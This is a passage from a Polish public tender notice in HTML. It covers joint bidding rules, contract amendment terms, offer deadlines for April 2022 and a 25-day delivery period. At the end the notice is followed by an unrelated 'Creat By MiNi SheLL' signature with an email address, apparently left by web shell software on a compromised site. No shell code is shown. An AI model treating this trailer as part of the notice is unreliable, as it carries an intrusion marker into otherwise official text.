dokumentów.<br/>3.Okres wyrażony w latach, o których mowa w pkt 2.SWZ powyżej, liczy się wstecz od dnia, w którym upływa termin składania ofert w postępowaniu.<br/>4.Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa w pkt 2.powyżej dotyczy dostaw, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>1.1. Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia:<br/>a.	są zobowiązani ustanowić pełnomocnika do reprezentowania ich w postępowaniu <br/>albo do reprezentowania ich w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego,<br/>b.są zobowiązani do złożenia w ofercie Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt 1.1. lit a) powyżej. Przedmiotowe pełnomocnictwo stanowi załącznik nr 6 do SWZ. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja kierowana będzie wyłącznie do podmiotu występującego jako pełnomocnik.<br/>2. Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania.<br/>3.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt. 2 Rozdziału VIII SWZ, składa każdy z Wykonawców wspólnie ubiegający się o udzielnie zamówienia wraz z ofertą. Oświadczenie to potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.Spółka cywilna, jest kwalifikowana jako wykonawcy wspólnie ubiegający się o udzielenie zamówienia, dlatego jej wspólnicy zobowiązani są ustanowić pełnomocnika do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. Ponadto, każdy ze wspólników spółki cywilnej zobowiązany jest do złożenia wraz z ofertą oświadczenia o niepodleganiu wykluczeniu, o których mowa w pkt. 2 Rozdziału VIII SWZ. <br/>5.Zgodnie z art. 58 ust. 5 Ustawy Pzp, przepisy Ustawy Pzp dotyczące wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1. Ustawy Pzp oraz art. 109 ust. 1 pkt 4 Ustawy Pzp, natomiast spełnienie warunku udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt 2 Rozdziału VII SWZ.<br/>7.W celu wykazania braku podstaw do wykluczenia, o których mowa w pkt. 3.1. i 3.2. Rozdziału VII SWZ oraz spełnienia warunków udziału w postępowaniu, o których mowa w pkt 2. Rozdziału VII SWZ Wykonawcy składają oświadczania i dokumenty określone w Rozdziale VIII SWZ w sposób i w trybie określonym w SWZ.<br/>8.	Zgodnie z art. 445 ust. 1 Ustawy Pzp, wszyscy Wykonawcy składający wspólną ofertę ponoszą odpowiedzialność solidarną za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy od wszystkich wykonawców łącznie lub od każdego z osobna.<br/>9. Spełnienie warunków udziału w postępowaniu przez wykonawców wspólnie ubiegających się o udzielenie zamówienia będzie weryfikowane przez Zamawiającego zgodnie z art. 117 ust. 3 Ustawy Pzp:<br/> W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>10.	Każdy z Wykonawców wspólnie ubiegający się o udzielenie zamówienia musi wykazać brak podstaw do wykluczenia. <br/>11.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>Pełna treść informacji znajduje się w Rozdziale IX SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian oraz warunki ich wprowadzenia określone zostały w § 10<br/>- Zmiany do umowy Projektowanych postanowień umowy stanowiących zał. nr 10 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://plodz.ezamawiajacy.pl w zakładce „OFERTY”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-22 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonawca zobowiązany jest wykonać przedmiot zamówienia w terminie: <br/> do 25 dni od dnia podpisania umowy.<br/>2.	Termin dostawy stanowi kryterium oceny ofert. Powyższy termin może ulec skróceniu <br/>w przypadku zaoferowania przez Wykonawcę w ofercie krótszego terminu zgodnie <br/>z zapisami Rozdziału XIX SWZ.<br/>3.	Terminem zakończenia zamówienia będzie data podpisania przez Strony umowy protokołu odbioru lub protokołu odbioru końcowego zgodnie z zapisami załącznika nr 10 do SWZ – Projektowane postanowienia umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com